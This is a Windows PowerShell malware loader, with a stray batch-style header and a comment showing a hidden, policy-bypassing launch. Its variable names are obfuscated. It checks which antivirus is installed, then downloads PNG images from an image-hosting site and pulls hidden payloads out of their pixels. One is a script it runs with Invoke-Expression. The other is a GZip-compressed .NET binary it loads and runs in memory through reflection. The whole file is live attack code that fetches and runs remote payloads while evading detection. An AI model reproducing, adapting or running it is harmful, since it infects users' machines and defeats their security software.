setlocal enabledelayedexpansion
@echo off

# Command executed: start conhost.exe --headless powershell.exe -ep bypass -w h -c "..."

$iiQrcg = Get-CimInstance -Namespace "root\SecurityCenter2" -ClassName AntiVirusProduct -ErrorAction SilentlyContinue
$jA1pw = $false

if ($iiQrcg) {
    foreach ($y3lrmBdved in $iiQrcg) {
        $wLYUgiwYVrg = $y3lrmBdved.displayName
        
        # Check for specific AVs to use alternate payload
        if ($wLYUgiwYVrg -like "*Malwarebytes*" -or $wLYUgiwYVrg -like "*F-Secure*") {
            Add-Type -AssemblyName System.Drawing
            $pz0pL = "https://"
            $s6YzyUvQ = "i.ibb.co/LXZsz3Jv/oabju2wl.png"
            $mvjYofVBBrx = $pz0pL + $s6YzyUvQ
            
            $hEBKIZ = New-Object System.Net.WebClient
            $p2wmB1xghAn = $hEBKIZ.DownloadData($mvjYofVBBrx)
            $hEBKIZ.Dispose()
            
            $kzk2C = New-Object IO.MemoryStream(,$p2wmB1xghAn)
            $sh4KDxRF = [System.Drawing.Bitmap]::FromStream($kzk2C)
            
            # Steganography: Get length from first two pixels
            $eO0Vpvj = $sh4KDxRF.GetPixel(0,0)
            $vJ3Cz = $sh4KDxRF.GetPixel(1,0)
            $x7goLCcas = ([uint32]$eO0Vpvj.R -shl 24) -bor ([uint32]$eO0Vpvj.G -shl 16) -bor ([uint32]$eO0Vpvj.B -shl 8) -bor [uint32]$vJ3Cz.R
            
            $k1fUFqcPRzg = New-Object byte[] $x7goLCcas
            $xH88LhPmv = 0
            $hAaNwifdpkw = 2
            $jxpzGHGoU9J = 0
            
            # Extract bytes from RGB channels
            while ($xH88LhPmv -lt $x7goLCcas) {
                $bIqN04 = $sh4KDxRF.GetPixel($hAaNwifdpkw, $jxpzGHGoU9J)
                $k1fUFqcPRzg[$xH88LhPmv++] = $bIqN04.R
                if ($xH88LhPmv -lt $x7goLCcas) { $k1fUFqcPRzg[$xH88LhPmv++] = $bIqN04.G }
                if ($xH88LhPmv -lt $x7goLCcas) { $k1fUFqcPRzg[$xH88LhPmv++] = $bIqN04.B }
                $hAaNwifdpkw++
                if ($hAaNwifdpkw -ge $sh4KDxRF.Width) {
                    $hAaNwifdpkw = 0
                    $jxpzGHGoU9J++
                }
            }
            
            $sh4KDxRF.Dispose()
            $kzk2C.Dispose()
            
            # Execute extracted script
            $cHzIPU2 = [System.Text.Encoding]::UTF8.GetString($k1fUFqcPRzg)
            Invoke-Expression $cHzIPU2
            $jA1pw = $true
            break
        }
    }
}

# Main payload execution flow (if no matching AV found or break not hit)
Add-Type -AssemblyName System.Drawing
$m16Y8y7nn = "https://"
$lwYZ4Df = "i.ibb.co/Mk72ZRQ6/ervqt4eoyg9.png"
$djR61 = $m16Y8y7nn + $lwYZ4Df

$raon81iL88f = New-Object System.Net.WebClient
$yX37ooO8OUL = $raon81iL88f.DownloadData($djR61)
$raon81iL88f.Dispose()

$e5ueVt4 = New-Object IO.MemoryStream(,$yX37ooO8OUL)
$z7j7jUpv = [System.Drawing.Bitmap]::FromStream($e5ueVt4)

# Get payload length from specific pixels
$vy0U5H = $z7j7jUpv.GetPixel(0,0)
$ej4Ds3u = $z7j7jUpv.GetPixel(1,0)
$k1dcHd0OeI9 = ([uint32]$vy0U5H.R -shl 24) -bor ([uint32]$vy0U5H.G -shl 16) -bor ([uint32]$vy0U5H.B -shl 8) -bor [uint32]$ej4Ds3u.R

# Iterate through image to collect bytes
$q5YE8sSXvVM = New-Object System.Collections.Generic.List[byte]
for ($kc2LzB = 0; $kc2LzB -lt $z7j7jUpv.Height; $kc2LzB++) {
    for ($cMpJsR = 0; $cMpJsR -lt $z7j7jUpv.Width; $cMpJsR++) {
        if (($cMpJsR -eq 0 -and $kc2LzB -eq 0) -or ($cMpJsR -eq 1 -and $kc2LzB -eq 0)) { continue }
        $um9UVl = $z7j7jUpv.GetPixel($cMpJsR, $kc2LzB)
        $q5YE8sSXvVM.Add($um9UVl.R)
        $q5YE8sSXvVM.Add($um9UVl.G)
        $q5YE8sSXvVM.Add($um9UVl.B)
    }
}

$z7j7jUpv.Dispose()
$e5ueVt4.Dispose()

# Reconstruct GZip stream from bytes
$oOpvAEakGIM = $q5YE8sSXvVM.ToArray()[0..($k1dcHd0OeI9-1)]
$vOFkop = New-Object IO.MemoryStream(,$oOpvAEakGIM)
$j2wxwFXVE = New-Object IO.MemoryStream
$vLaAr0xM = New-Object IO.Compression.GZipStream($vOFkop, [IO.Compression.CompressionMode]::Decompress)
$vLaAr0xM.CopyTo($j2wxwFXVE)

$vLaAr0xM.Dispose()
$vOFkop.Dispose()
$z6n5fQ = $j2wxwFXVE.ToArray() # This is the final .NET binary
$j2wxwFXVE.Dispose()

# Final Reflective Loading and Execution
foreach ($b1IsbUEi0el in [AppDomain]::CurrentDomain.GetAssemblies()) {
    if ($b1IsbUEi0el.GlobalAssemblyCache -and $b1IsbUEi0el.Location.Contains('mscor' + 'lib.dll')) {
        foreach ($xZMSFO in $b1IsbUEi0el.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')) {
            if ($xZMSFO.ToString()[37] -eq ']') {
                $yMZIXiH9qQ = $xZMSFO.Invoke($null, (,$z6n5fQ))
                $yrQAC = $yMZIXiH9qQ.EntryPoint
                $fmEdg1JmOgT = $yrQAC.GetParameters().Count
                if ($fmEdg1JmOgT -eq 0) {
                    $yrQAC.Invoke($null, $null)
                } else {
                    $yrQAC.Invoke($null, (,@()))
                }
                break
            }
        }
        break
    }
}
